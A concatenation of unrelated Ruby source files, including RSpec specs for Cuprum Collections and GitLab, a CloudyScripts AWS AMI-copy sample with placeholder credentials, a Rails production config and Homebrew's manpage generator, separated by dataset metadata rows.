# Spec for the basic UpdateOne command; the actual behavior assertions live
# in the included shared contracts.
RSpec.describe Cuprum::Collections::Basic::Commands::UpdateOne do
  include Spec::Support::Examples::BasicCommandExamples

  include_context 'with parameters for a basic contract'

  subject(:command) do
    described_class.new(
      collection_name: collection_name,
      data: mapped_data,
      **constructor_options
    )
  end

  # Fixture attributes used by the shared contracts.
  let(:attributes) do
    {
      id: 0,
      title: 'Gideon the Ninth',
      author: 'Tammsyn Muir'
    }
  end

  # Basic collections store entities as string-keyed hashes.
  let(:entity) do
    tools.hash_tools.convert_keys_to_strings(attributes)
  end

  let(:query) do
    Cuprum::Collections::Basic::Query.new(mapped_data)
  end

  let(:expected_data) do
    tools.hash_tools.convert_keys_to_strings(matching_data)
  end

  # SleepingKingStudios toolbelt, used for the key conversions above.
  def tools
    SleepingKingStudios::Tools::Toolbelt.instance
  end

  describe '.new' do
    it 'should define the constructor' do
      expect(described_class)
        .to respond_to(:new)
        .with(0).arguments
        .and_keywords(:collection_name, :data)
        .and_any_keywords
    end
  end

  include_contract Cuprum::Collections::Basic::RSpec::COMMAND_CONTRACT

  include_contract Cuprum::Collections::RSpec::UPDATE_ONE_COMMAND_CONTRACT

  # Re-runs the contract with a :uuid primary key instead of :id.
  wrap_context 'with a custom primary key' do
    let(:attributes) do
      super()
        .tap { |hsh| hsh.delete(:id) }
        .merge(uuid: '00000000-0000-0000-0000-000000000000')
    end

    include_contract Cuprum::Collections::RSpec::UPDATE_ONE_COMMAND_CONTRACT
  end
end
| 25.75 | 76 | 0.717304 |
e264c079c835ad18780b4e4bada1e48d58eac5dc | 5,832 | require 'rubygems'
require 'help/remote_command_handler'
require 'help/state_change_listener'
require 'scripts/ec2/copy_mswindows_ami'
require 'AWS'
module SecludIT
module CloudyScripts
# Static lookup tables mapping AWS regional EC2 endpoints to known AMI IDs
# used by the CloudyScripts samples.
class AwsEc2Helper
  # Resolves +region+ (an EC2 endpoint hostname) against +map+.
  # @raise [ArgumentError] for unknown regions. Previously this raised a bare
  #   Exception, which a default `rescue` (StandardError) cannot catch.
  def self.lookup_ami(map, region)
    map.fetch(region) { raise ArgumentError, "region not supported: #{region}" }
  end
  private_class_method :lookup_ami

  #XXX: retrieve a getting-started-with-ebs-boot AMI of Amazon according to Amazon Region
  def self.get_starter_ami(region)
    lookup_ami(
      {
        'us-east-1.ec2.amazonaws.com' => 'ami-b232d0db',
        'us-west-1.ec2.amazonaws.com' => 'ami-813968c4',
        'eu-west-1.ec2.amazonaws.com' => 'ami-df1e35ab',
        'ap-southeast-1.ec2.amazonaws.com' => 'ami-99f58acb',
        'ap-northeast-1.ec2.amazonaws.com' => 'ami-2e08a32f'
      },
      region
    )
  end

  #XXX: Basic 32-bit Amazon Linux AMI 2011.02.1 Beta
  def self.get_basic_aws_linux_ami_old(region)
    lookup_ami(
      {
        'us-east-1.ec2.amazonaws.com' => 'ami-09ab6d60', #'ami-8c1fece5',
        'us-west-1.ec2.amazonaws.com' => 'ami-17eebc52', #'ami-3bc9997e',
        'eu-west-1.ec2.amazonaws.com' => 'ami-940030e0', #'ami-47cefa33',
        'ap-southeast-1.ec2.amazonaws.com' => 'ami-cec9b19c', #'ami-6af08e38',
        'ap-northeast-1.ec2.amazonaws.com' => 'ami-96b50097' #'ami-300ca731'
      },
      region
    )
  end

  # Public CloudyScripts AMI: Basic 32-bit Amazon Linux AMI 2011.02.1 Beta
  # XXX: Update on 11/11/2011 based on
  # - Basic 32-bit Amazon Linux AMI 2011.09 (amazon/amzn-ami-2011.09.2.i386-ebs)
  def self.get_basic_aws_linux_ami(region)
    lookup_ami(
      {
        'us-east-1.ec2.amazonaws.com' => 'ami-23f53c4a', #'ami-09ab6d60', #'ami-8c1fece5',
        'us-west-1.ec2.amazonaws.com' => 'ami-013a6544', #'ami-17eebc52', #'ami-3bc9997e',
        'us-west-2.ec2.amazonaws.com' => 'ami-42f77a72',
        'eu-west-1.ec2.amazonaws.com' => 'ami-f3c3fe87', #'ami-940030e0', #'ami-47cefa33',
        'ap-southeast-1.ec2.amazonaws.com' => 'ami-b4f18be6', #'ami-cec9b19c', #'ami-6af08e38',
        'ap-northeast-1.ec2.amazonaws.com' => 'ami-8a07b38b', #'ami-96b50097' #'ami-300ca731'
        'sa-east-1.ec2.amazonaws.com' => 'ami-1e34eb03'
      },
      region
    )
  end
end
# Sample listener printing CloudyScripts progress to stdout.
class StateChangeListenerSample < StateChangeListener
  # Called on every state transition; flags terminal states.
  def state_changed(state)
    puts "state change notification: new state = #{state.to_s} #{state.done? ? '(terminated)' : ''}"
  end

  # Called for progress messages; +level+ defaults to Logger::DEBUG.
  def new_message(message, level = Logger::DEBUG)
    puts "#{level}: new progress message = #{message}"
  end
end
# Sample driver that copies an MS Windows AMI from one AWS region to another
# using CloudyScripts' CopyMsWindowsAmi script. All credentials, key paths
# and AMI IDs below are placeholders and must be replaced before running.
class CopyMsWindowsAmiSampleCode
  def self.run()
    aws_access_key = "MyAccessKey" # Your AWS access key
    aws_secret_key = "MySecretKey" # Your AWS secret key
    # Source region: where the AMI to copy lives.
    aws_source_endpoint = "us-east-1.ec2.amazonaws.com"
    aws_source_region = "us-east-1.ec2.amazonaws.com"
    source_ssh_user = "ec2-user"
    source_ssh_key_file = "/root/secludit_keys/secludit_us_east.pem"
    source_ssh_key_name = "secludit_us_east"
    # sample: Microsoft Windows Server 2008 Base
    aws_ami_id = "ami-7dd60314" # Your EC2 AMI to Copy
    #aws_helper_ami_id = "ami-ed3768a8" # AMI in the target region of the same type of the one been converted from the source region
    aws_helper_ami_id = "ami-863be49b"
    # Target region: where the copied AMI will be registered.
    #aws_target_endpoint = "us-west-1.ec2.amazonaws.com"
    aws_target_endpoint = "sa-east-1.ec2.amazonaws.com"
    aws_target_region = "sa-east-1.ec2.amazonaws.com"
    target_ssh_user = "ec2-user"
    target_ssh_key_file = "/root/secludit_keys/secludit_sa_east_1.pem"
    target_ssh_key_name = "secludit_sa_east_1"
    new_ami_name = "CloudyScripts MS Windows AMI copy"
    new_ami_description = "Copy of MS Windows AMI #{aws_ami_id} from AWS US-East-1 to SA-East-1"
    # One EC2 API handle per region.
    source_ec2_api = AWS::EC2::Base.new(:access_key_id => aws_access_key, :secret_access_key => aws_secret_key, :server => aws_source_endpoint)
    target_ec2_api = AWS::EC2::Base.new(:access_key_id => aws_access_key, :secret_access_key => aws_secret_key, :server => aws_target_endpoint)
    ssh = RemoteCommandHandler.new()
    listener = SecludIT::CloudyScripts::StateChangeListenerSample.new()
    logger = Logger.new(STDOUT)
    logger.level = Logger::DEBUG
    puts "describe images: #{source_ec2_api.describe_images(:image_id => aws_ami_id).inspect}"
    params = {
      :ami_id => aws_ami_id,
      :helper_ami_id => aws_helper_ami_id,
      :source_ami_id => SecludIT::CloudyScripts::AwsEc2Helper.get_basic_aws_linux_ami(aws_source_region),
      :ec2_api_handler => source_ec2_api,
      :target_ec2_handler => target_ec2_api,
      :source_ssh_username => source_ssh_user,
      :source_key_name => source_ssh_key_name,
      :source_ssh_keyfile => source_ssh_key_file,
      # File.read closes the handle when done; File.new(...).read leaked it.
      :source_ssh_keydata => File.read(source_ssh_key_file),
      :target_ami_id => SecludIT::CloudyScripts::AwsEc2Helper.get_basic_aws_linux_ami(aws_target_region),
      :target_ssh_username => target_ssh_user,
      :target_key_name => target_ssh_key_name,
      :target_ssh_keyfile => target_ssh_key_file,
      :target_ssh_keydata => File.read(target_ssh_key_file),
      :logger => logger,
      :remote_command_handler => ssh,
      :name => new_ami_name,
      :description => new_ami_description
    }
    script = CopyMsWindowsAmi.new(params)
    script.register_state_change_listener(listener)
    script.register_progress_message_listener(listener)
    starttime = Time.now.to_i
    script.start_script()
    endtime = Time.now.to_i
    #puts "results = #{script.get_execution_result().inspect}"
    puts "== > Results of Copy AMI: #{script.get_execution_result()[:done]}"
    puts "New AMI ID: #{script.get_execution_result()[:image_id]}"
    puts "done in #{endtime - starttime}s"
  end
end
end
end
#
# Launch Simple test
#
SecludIT::CloudyScripts::CopyMsWindowsAmiSampleCode.run()
| 37.625806 | 143 | 0.700274 |
0844616ee1cedd433a30d8ca751fb9cd8f7679dd | 3,203 | # frozen_string_literal: true
require 'spec_helper'
# Specs for Gitlab::Database::DynamicModelHelpers, a mixin that builds
# ad-hoc ActiveRecord models for an arbitrary table and iterates rows in
# batches outside of a transaction.
RSpec.describe Gitlab::Database::DynamicModelHelpers do
  let(:including_class) { Class.new.include(described_class) }
  let(:table_name) { 'projects' }
  describe '#define_batchable_model' do
    subject { including_class.new.define_batchable_model(table_name) }
    it 'is an ActiveRecord model' do
      expect(subject.ancestors).to include(ActiveRecord::Base)
    end
    it 'includes EachBatch' do
      expect(subject.included_modules).to include(EachBatch)
    end
    it 'has the correct table name' do
      expect(subject.table_name).to eq(table_name)
    end
    # STI is disabled so a `type` column in the table is treated as data.
    it 'has the inheritance type column disable' do
      expect(subject.inheritance_column).to eq('_type_disabled')
    end
  end
  describe '#each_batch' do
    subject { including_class.new }
    before do
      create_list(:project, 2)
    end
    context 'when no transaction is open' do
      before do
        allow(subject).to receive(:transaction_open?).and_return(false)
      end
      it 'iterates table in batches' do
        each_batch_size = ->(&block) do
          subject.each_batch(table_name, of: 1) do |batch|
            block.call(batch.size)
          end
        end
        # Two records with a batch size of 1 => two batches of size 1.
        expect { |b| each_batch_size.call(&b) }
          .to yield_successive_args(1, 1)
      end
    end
    context 'when transaction is open' do
      before do
        allow(subject).to receive(:transaction_open?).and_return(true)
      end
      it 'raises an error' do
        expect { subject.each_batch(table_name, of: 1) { |batch| batch.size } }
          .to raise_error(RuntimeError, /each_batch should not run inside a transaction/)
      end
    end
  end
  describe '#each_batch_range' do
    subject { including_class.new }
    let(:first_project) { create(:project) }
    let(:second_project) { create(:project) }
    context 'when no transaction is open' do
      before do
        allow(subject).to receive(:transaction_open?).and_return(false)
      end
      # Each yielded value is an inclusive [lower_id, upper_id] pair.
      it 'iterates table in batch ranges' do
        expect { |b| subject.each_batch_range(table_name, of: 1, &b) }
          .to yield_successive_args(
            [first_project.id, first_project.id],
            [second_project.id, second_project.id]
          )
      end
      it 'yields only one batch if bigger than the table size' do
        expect { |b| subject.each_batch_range(table_name, of: 2, &b) }
          .to yield_successive_args([first_project.id, second_project.id])
      end
      it 'makes it possible to apply a scope' do
        each_batch_limited = ->(&b) do
          subject.each_batch_range(table_name, scope: ->(table) { table.limit(1) }, of: 1, &b)
        end
        expect { |b| each_batch_limited.call(&b) }
          .to yield_successive_args([first_project.id, first_project.id])
      end
    end
    context 'when transaction is open' do
      before do
        allow(subject).to receive(:transaction_open?).and_return(true)
      end
      it 'raises an error' do
        expect { subject.each_batch_range(table_name, of: 1) { 1 } }
          .to raise_error(RuntimeError, /each_batch should not run inside a transaction/)
      end
    end
  end
end
| 28.855856 | 94 | 0.646269 |
module ApplicationHelper
  # Builds the browser title on a per-page basis: the base title alone when
  # no page title is given, otherwise "<page title> | <base title>".
  def full_title(page_title = '')
    base_title = "Connecting Grinnellians"
    page_title.empty? ? base_title : "#{page_title} | #{base_title}"
  end
end
| 18.785714 | 47 | 0.653992 |
032449465f234d7c062c95bc5aa994cce70957d8 | 5,082 | # frozen_string_literal: true
# Production environment settings for this Rails application.
Rails.application.configure do
  # Settings specified here will take precedence over those in config/application.rb.
  # Code is not reloaded between requests.
  config.cache_classes = true
  # Eager load code on boot. This eager loads most of Rails and
  # your application in memory, allowing both threaded web servers
  # and those relying on copy on write to perform better.
  # Rake tasks automatically ignore this option for performance.
  config.eager_load = true
  # Full error reports are disabled and caching is turned on.
  config.consider_all_requests_local       = false
  config.action_controller.perform_caching = true
  # Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
  # or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
  # config.require_master_key = true
  # Disable serving static files from the `/public` folder by default since
  # Apache or NGINX already handles this.
  config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
  # Compress CSS using a preprocessor.
  # config.assets.css_compressor = :sass
  # Do not fallback to assets pipeline if a precompiled asset is missed.
  # NOTE(review): live asset compilation in production is a known performance
  # risk; consider precompiling assets and setting this back to false — confirm
  # with the deploy pipeline before changing.
  config.assets.compile = true
  # Enable serving of images, stylesheets, and JavaScripts from an asset server.
  # config.action_controller.asset_host = 'http://assets.example.com'
  # Specifies the header that your server uses for sending files.
  # config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
  # config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
  # Store uploaded files on the local file system (see config/storage.yml for options).
  config.active_storage.service = :local
  # Mount Action Cable outside main process or domain.
  # config.action_cable.mount_path = nil
  # config.action_cable.url = 'wss://example.com/cable'
  # config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
  # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
  # config.force_ssl = true
  # Use the lowest log level to ensure availability of diagnostic information
  # when problems arise.
  # NOTE(review): :debug in production is verbose and may log sensitive data;
  # :info is the common production default — confirm before changing.
  config.log_level = :debug
  # Prepend all log lines with the following tags.
  config.log_tags = [:request_id]
  # Use a different cache store in production.
  # config.cache_store = :mem_cache_store
  # Use a real queuing backend for Active Job (and separate queues per environment).
  # config.active_job.queue_adapter     = :resque
  # config.active_job.queue_name_prefix = "rails_capstone_project_production"
  config.action_mailer.perform_caching = false
  # Ignore bad email addresses and do not raise email delivery errors.
  # Set this to true and configure the email server for immediate delivery to raise delivery errors.
  # config.action_mailer.raise_delivery_errors = false
  # Enable locale fallbacks for I18n (makes lookups for any locale fall back to
  # the I18n.default_locale when a translation cannot be found).
  config.i18n.fallbacks = true
  # Send deprecation notices to registered listeners.
  config.active_support.deprecation = :notify
  # Use default logging formatter so that PID and timestamp are not suppressed.
  config.log_formatter = ::Logger::Formatter.new
  # Use a different logger for distributed setups.
  # require 'syslog/logger'
  # config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
  if ENV['RAILS_LOG_TO_STDOUT'].present?
    logger           = ActiveSupport::Logger.new(STDOUT)
    logger.formatter = config.log_formatter
    config.logger    = ActiveSupport::TaggedLogging.new(logger)
  end
  # Do not dump schema after migrations.
  config.active_record.dump_schema_after_migration = false
  # Inserts middleware to perform automatic connection switching.
  # The `database_selector` hash is used to pass options to the DatabaseSelector
  # middleware. The `delay` is used to determine how long to wait after a write
  # to send a subsequent read to the primary.
  #
  # The `database_resolver` class is used by the middleware to determine which
  # database is appropriate to use based on the time delay.
  #
  # The `database_resolver_context` class is used by the middleware to set
  # timestamps for the last write to the primary. The resolver uses the context
  # class timestamps to determine how long to wait before reading from the
  # replica.
  #
  # By default Rails will store a last write timestamp in the session. The
  # DatabaseSelector middleware is designed as such you can define your own
  # strategy for connection switching and pass that into the middleware through
  # these configuration options.
  # config.active_record.database_selector = { delay: 2.seconds }
  # config.active_record.database_resolver = ActiveRecord::Middleware::DatabaseSelector::Resolver
  # config.active_record.database_resolver_context = ActiveRecord::Middleware::DatabaseSelector::Resolver::Session
end
| 43.435897 | 114 | 0.763676 |
ed91ce519d58bc4d55e4f90cb9b8aeff0df56735 | 6,043 | # frozen_string_literal: true
require 'spec_helper'
# Feature-level specs asserting the attributes exposed for each project-level
# value stream analytics stage (issue, plan, code, test, review, staging).
RSpec.describe 'value stream analytics events', :aggregate_failures do
  let_it_be(:project) { create(:project, :repository) }
  let_it_be(:user) { project.owner }
  let(:from_date) { 10.days.ago }
  let!(:context) { create(:issue, project: project, created_at: 2.days.ago) }
  # Events of the stage under test, scoped to the date range and current user.
  let(:events) do
    CycleAnalytics::ProjectLevel
      .new(project, options: { from: from_date, current_user: user })[stage]
      .events
  end
  let(:event) { events.first }
  before do
    setup(context)
  end
  describe '#issue_events' do
    let(:stage) { :issue }
    it 'has correct attributes' do
      expect(event[:total_time]).not_to be_empty
      expect(event[:title]).to eq(context.title)
      expect(event[:url]).not_to be_nil
      expect(event[:iid]).to eq(context.iid.to_s)
      expect(event[:created_at]).to end_with('ago')
      expect(event[:author][:web_url]).not_to be_nil
      expect(event[:author][:avatar_url]).not_to be_nil
      expect(event[:author][:name]).to eq(context.author.name)
    end
  end
  describe '#plan_events' do
    let(:stage) { :plan }
    before do
      create_commit_referencing_issue(context)
      # Adding extra duration because the new VSA backend filters out 0 durations between these columns
      context.metrics.update!(first_mentioned_in_commit_at: context.metrics.first_associated_with_milestone_at + 1.day)
    end
    it 'has correct attributes' do
      expect(event[:total_time]).not_to be_empty
      expect(event[:title]).to eq(context.title)
      expect(event[:url]).not_to be_nil
      expect(event[:iid]).to eq(context.iid.to_s)
      expect(event[:created_at]).to end_with('ago')
      expect(event[:author][:web_url]).not_to be_nil
      expect(event[:author][:avatar_url]).not_to be_nil
      expect(event[:author][:name]).to eq(context.author.name)
    end
  end
  describe '#code_events' do
    let(:stage) { :code }
    let!(:merge_request) { MergeRequest.first }
    before do
      create_commit_referencing_issue(context)
    end
    it 'has correct attributes' do
      expect(event[:total_time]).not_to be_empty
      expect(event[:title]).to eq('Awesome merge_request')
      expect(event[:iid]).to eq(context.iid.to_s)
      expect(event[:created_at]).to end_with('ago')
      expect(event[:author][:web_url]).not_to be_nil
      expect(event[:author][:avatar_url]).not_to be_nil
      expect(event[:author][:name]).to eq(MergeRequest.first.author.name)
    end
  end
  describe '#test_events', :sidekiq_might_not_need_inline do
    let(:stage) { :test }
    let(:merge_request) { MergeRequest.first }
    let!(:context) { create(:issue, project: project, created_at: 2.days.ago) }
    # Pipeline attached to the MR head so the test stage has build data.
    let!(:pipeline) do
      create(:ci_pipeline,
             ref: merge_request.source_branch,
             sha: merge_request.diff_head_sha,
             project: project,
             head_pipeline_of: merge_request)
    end
    before do
      create(:ci_build, :success, pipeline: pipeline, author: user)
      create(:ci_build, :success, pipeline: pipeline, author: user)
      pipeline.run!
      pipeline.succeed!
      merge_merge_requests_closing_issue(user, project, context)
    end
    it 'has correct attributes' do
      expect(event[:name]).not_to be_nil
      expect(event[:id]).not_to be_nil
      expect(event[:url]).not_to be_nil
      expect(event[:branch]).not_to be_nil
      expect(event[:branch][:url]).not_to be_nil
      expect(event[:short_sha]).not_to be_nil
      expect(event[:commit_url]).not_to be_nil
      expect(event[:date]).not_to be_nil
      expect(event[:total_time]).not_to be_empty
    end
  end
  describe '#review_events' do
    let(:stage) { :review }
    let!(:context) { create(:issue, project: project, created_at: 2.days.ago) }
    before do
      merge_merge_requests_closing_issue(user, project, context)
    end
    it 'has correct attributes' do
      expect(event[:total_time]).not_to be_empty
      expect(event[:title]).to eq('Awesome merge_request')
      expect(event[:iid]).to eq(context.iid.to_s)
      expect(event[:url]).not_to be_nil
      expect(event[:state]).not_to be_nil
      expect(event[:created_at]).not_to be_nil
      expect(event[:author][:web_url]).not_to be_nil
      expect(event[:author][:avatar_url]).not_to be_nil
      expect(event[:author][:name]).to eq(MergeRequest.first.author.name)
    end
  end
  describe '#staging_events', :sidekiq_might_not_need_inline do
    let(:stage) { :staging }
    let(:merge_request) { MergeRequest.first }
    let!(:pipeline) do
      create(:ci_pipeline,
             ref: merge_request.source_branch,
             sha: merge_request.diff_head_sha,
             project: project,
             head_pipeline_of: merge_request)
    end
    before do
      create(:ci_build, :success, pipeline: pipeline, author: user)
      create(:ci_build, :success, pipeline: pipeline, author: user)
      pipeline.run!
      pipeline.succeed!
      merge_merge_requests_closing_issue(user, project, context)
      # A deployment is required for the staging stage to produce events.
      deploy_master(user, project)
    end
    it 'has correct attributes' do
      expect(event[:name]).not_to be_nil
      expect(event[:id]).not_to be_nil
      expect(event[:url]).not_to be_nil
      expect(event[:branch]).not_to be_nil
      expect(event[:branch][:url]).not_to be_nil
      expect(event[:short_sha]).not_to be_nil
      expect(event[:commit_url]).not_to be_nil
      expect(event[:date]).not_to be_nil
      expect(event[:total_time]).not_to be_empty
      expect(event[:author][:web_url]).not_to be_nil
      expect(event[:author][:avatar_url]).not_to be_nil
      expect(event[:author][:name]).to eq(MergeRequest.first.author.name)
    end
  end
  # Shared fixture: milestone the issue, open an MR whose commit references
  # it, and run the commit worker so stage timestamps are populated.
  def setup(context)
    milestone = create(:milestone, project: project)
    context.update!(milestone: milestone)
    mr = create_merge_request_closing_issue(user, project, context, commit_message: "References #{context.to_reference}")
    ProcessCommitWorker.new.perform(project.id, user.id, mr.commits.last.to_hash)
  end
end
| 33.021858 | 121 | 0.675658 |
# Factory producing ConversionHost records with unique names whose
# alphabetical order matches their numeric order.
FactoryGirl.define do
  factory :conversion_host do
    # e.g. "conversion_host_0001" — zero-padded via seq_padded_for_sorting
    sequence(:name) do |n|
      "conversion_host_#{seq_padded_for_sorting(n)}"
    end
  end
end
| 22.833333 | 74 | 0.737226 |
6a3e27c3728554253d46ee722e107aa2760e8865 | 8,944 | # typed: false
# frozen_string_literal: true
require "formula"
require "erb"
require "ostruct"
require "cli/parser"
# `brew man`: regenerates Homebrew's manpage and Markdown documentation from
# an ERB template plus the parsed CLI command definitions.
module Homebrew
  extend T::Sig

  module_function

  SOURCE_PATH = (HOMEBREW_LIBRARY_PATH/"manpages").freeze
  TARGET_MAN_PATH = (HOMEBREW_REPOSITORY/"manpages").freeze
  TARGET_DOC_PATH = (HOMEBREW_REPOSITORY/"docs").freeze

  sig { returns(CLI::Parser) }
  def man_args
    Homebrew::CLI::Parser.new do
      usage_banner <<~EOS
        `man` [<options>]

        Generate Homebrew's manpages.
      EOS
      switch "--fail-if-changed",
             description: "Return a failing status code if changes are detected in the manpage outputs. This "\
                          "can be used to notify CI when the manpages are out of date. Additionally, "\
                          "the date used in new manpages will match those in the existing manpages (to allow "\
                          "comparison without factoring in the date)."
      switch "--link",
             description: "This is now done automatically by `brew update`."

      max_named 0
    end
  end

  # Entry point: rebuilds the manpage/completions and, with
  # `--fail-if-changed`, fails when the generated output differs from git HEAD.
  def man
    args = man_args.parse

    odie "`brew man --link` is now done automatically by `brew update`." if args.link?

    Commands.rebuild_internal_commands_completion_list
    regenerate_man_pages(preserve_date: args.fail_if_changed?, quiet: args.quiet?)

    diff = system_command "git", args: [
      "-C", HOMEBREW_REPOSITORY, "diff", "--exit-code", "docs/Manpage.md", "manpages", "completions"
    ]
    if diff.status.success?
      puts "No changes to manpage or completions output detected."
    elsif args.fail_if_changed?
      puts "Changes to manpage or completions detected:"
      puts diff.stdout
      Homebrew.failed = true
    end
  end

  # Renders the manpage markup once and writes both output formats.
  def regenerate_man_pages(preserve_date:, quiet:)
    Homebrew.install_bundler_gems!

    markup = build_man_page(quiet: quiet)
    convert_man_page(markup, TARGET_DOC_PATH/"Manpage.md", preserve_date: preserve_date)
    convert_man_page(markup, TARGET_MAN_PATH/"brew.1", preserve_date: preserve_date)
  end

  # Fills the ERB template with command docs and maintainer sections pulled
  # from the repository README.
  def build_man_page(quiet:)
    template = (SOURCE_PATH/"brew.1.md.erb").read
    variables = OpenStruct.new

    variables[:commands] = generate_cmd_manpages(Commands.internal_commands_paths)
    variables[:developer_commands] = generate_cmd_manpages(Commands.internal_developer_commands_paths)
    variables[:official_external_commands] =
      generate_cmd_manpages(Commands.official_external_commands_paths(quiet: quiet))
    variables[:global_cask_options] = global_cask_options_manpage
    variables[:global_options] = global_options_manpage
    variables[:environment_variables] = env_vars_manpage

    # Read the README once (previously it was re-read for every section) and
    # extract the maintainer paragraphs with a shared helper.
    readme = (HOMEBREW_REPOSITORY/"README.md").read
    variables[:lead] = readme_section(readme, /(Homebrew's \[Project Leader.*\.)/)
    variables[:plc] = readme_section(readme, /(Homebrew's \[Project Leadership Committee.*\.)/)
    variables[:tsc] = readme_section(readme, /(Homebrew's \[Technical Steering Committee.*\.)/)
    variables[:linux] = readme_section(readme, %r{(Homebrew/brew's Linux maintainers .*\.)})
    variables[:maintainers] = readme_section(readme, /(Homebrew's other current maintainers .*\.)/)
    variables[:alumni] = readme_section(readme, /(Former maintainers .*\.)/)

    ERB.new(template, trim_mode: ">").result(variables.instance_eval { binding })
  end

  # Returns the first capture of +pattern+ in +text+ with Markdown links
  # (`[text](url)`) reduced to their link text.
  def readme_section(text, pattern)
    text[pattern, 1].gsub(/\[([^\]]+)\]\([^)]+\)/, '\1')
  end

  def sort_key_for_path(path)
    # Options after regular commands (`~` comes after `z` in ASCII table).
    path.basename.to_s.sub(/\.(rb|sh)$/, "").sub(/^--/, "~~")
  end

  # Renders the shared markup into the format implied by +target+'s extension.
  def convert_man_page(markup, target, preserve_date:)
    manual = target.basename(".1")
    organisation = "Homebrew"

    # Set the manpage date to the existing one if we're checking for changes.
    # This avoids the only change being e.g. a new date.
    date = if preserve_date && target.extname == ".1" && target.exist?
      /"(\d{1,2})" "([A-Z][a-z]+) (\d{4})" "#{organisation}" "#{manual}"/ =~ target.read
      Date.parse("#{Regexp.last_match(1)} #{Regexp.last_match(2)} #{Regexp.last_match(3)}")
    else
      Date.today
    end
    date = date.strftime("%Y-%m-%d")

    shared_args = %W[
      --pipe
      --organization=#{organisation}
      --manual=#{target.basename(".1")}
      --date=#{date}
    ]

    format_flag, format_desc = target_path_to_format(target)

    puts "Writing #{format_desc} to #{target}"
    Utils.popen(["ronn", format_flag] + shared_args, "rb+") do |ronn|
      ronn.write markup
      ronn.close_write
      ronn_output = ronn.read
      odie "Got no output from ronn!" if ronn_output.blank?

      # Post-process ronn's output per format.
      case format_flag
      when "--markdown"
        ronn_output = ronn_output.gsub(%r{<var>(.*?)</var>}, "*`\\1`*")
                                 .gsub(/\n\n\n+/, "\n\n")
      when "--roff"
        ronn_output = ronn_output.gsub(%r{<code>(.*?)</code>}, "\\fB\\1\\fR")
                                 .gsub(%r{<var>(.*?)</var>}, "\\fI\\1\\fR")
                                 .gsub(/(^\[?\\fB.+): /, "\\1\n    ")
      end
      target.atomic_write ronn_output
    end
  end

  def target_path_to_format(target)
    case target.basename
    when /\.md$/ then ["--markdown", "markdown"]
    when /\.\d$/ then ["--roff", "man page"]
    else
      odie "Failed to infer output format from '#{target.basename}'."
    end
  end

  # Collects the manpage section for every command file, honoring
  # `hide_from_man_page` and keeping the established sort order.
  def generate_cmd_manpages(cmd_paths)
    man_page_lines = []

    # preserve existing manpage order
    cmd_paths.sort_by(&method(:sort_key_for_path))
             .each do |cmd_path|
      # Parens silence Ruby's assignment-in-condition warning; commands
      # without a declarative parser fall back to `#:` comment parsing.
      cmd_man_page_lines = if (cmd_parser = CLI::Parser.from_cmd_path(cmd_path))
        next if cmd_parser.hide_from_man_page

        cmd_parser_manpage_lines(cmd_parser).join
      else
        cmd_comment_manpage_lines(cmd_path)
      end

      man_page_lines << cmd_man_page_lines
    end
    man_page_lines.compact.join("\n")
  end

  def cmd_parser_manpage_lines(cmd_parser)
    lines = [format_usage_banner(cmd_parser.usage_banner_text)]
    lines += cmd_parser.processed_options.map do |short, long, _, desc|
      if long.present?
        # Skip options documented once in the shared "global options" sections.
        next if Homebrew::CLI::Parser.global_options.include?([short, long, desc])
        next if Homebrew::CLI::Parser.global_cask_options.any? do |_, option, description:, **|
                  [long, "#{long}="].include?(option) && description == desc
                end
      end

      generate_option_doc(short, long, desc)
    end.reject(&:blank?)
    lines
  end

  # Legacy path: extracts documentation from `#:` comment headers in a
  # command file that has no CLI::Parser definition.
  def cmd_comment_manpage_lines(cmd_path)
    comment_lines = cmd_path.read.lines.grep(/^#:/)
    return if comment_lines.empty?
    return if comment_lines.first.include?("@hide_from_man_page")

    lines = [format_usage_banner(comment_lines.first).chomp]
    comment_lines.slice(1..-1)
                 .each do |line|
      line = line.slice(4..-2)
      unless line
        lines.last << "\n"
        next
      end

      # Omit the common global_options documented separately in the man page.
      next if line.match?(/--(debug|help|quiet|verbose) /)

      # Format one option or a comma-separated pair of short and long options.
      lines << line.gsub(/^ +(-+[a-z-]+), (-+[a-z-]+) +/, "* `\\1`, `\\2`:\n  ")
                   .gsub(/^ +(-+[a-z-]+) +/, "* `\\1`:\n  ")
    end
    lines.last << "\n"
    lines
  end

  sig { returns(String) }
  def global_cask_options_manpage
    lines = ["These options are applicable to subcommands accepting a `--cask` flag and all `cask` commands.\n"]
    lines += Homebrew::CLI::Parser.global_cask_options.map do |_, long, description:, **|
      generate_option_doc(nil, long, description)
    end
    lines.join("\n")
  end

  sig { returns(String) }
  def global_options_manpage
    lines = ["These options are applicable across multiple subcommands.\n"]
    lines += Homebrew::CLI::Parser.global_options.map do |short, long, desc|
      generate_option_doc(short, long, desc)
    end
    lines.join("\n")
  end

  sig { returns(String) }
  def env_vars_manpage
    lines = Homebrew::EnvConfig::ENVS.flat_map do |env, hash|
      entry = "  * `#{env}`:\n    #{hash[:description]}\n"
      default = hash[:default_text]
      default ||= "`#{hash[:default]}`." if hash[:default]
      entry += "\n\n    *Default:* #{default}\n" if default

      entry
    end
    lines.join("\n")
  end

  def generate_option_doc(short, long, desc)
    comma = (short && long) ? ", " : ""
    <<~EOS
      * #{format_short_opt(short)}#{comma}#{format_long_opt(long)}:
        #{desc}
    EOS
  end

  def format_short_opt(opt)
    "`#{opt}`" unless opt.nil?
  end

  def format_long_opt(opt)
    "`#{opt}`" unless opt.nil?
  end

  def format_usage_banner(usage_banner)
    usage_banner&.sub(/^(#: *\* )?/, "### ")
  end
end
| 33.498127 | 112 | 0.614714 |
d59fa000aed0b927912b833f2ac847c292a60966 | 264 | # frozen_string_literal: true
# StimulusReflex endpoint backing the sortable students table.
class StudentsTableReflex < ApplicationReflex
  include SortHelper

  # Re-renders the students table partial sorted on one of the whitelisted
  # columns.
  def sort
    columns = %w[first_name last_name guardian_last_name status]
    sort_records(records: Student.all, partial: "students_table", sort_columns: columns)
  end
end
| 22 | 71 | 0.765152 |
1d6faf256bde144c2c6c821c37a67d21caf10b35 | 450 | require 'spec_helper'
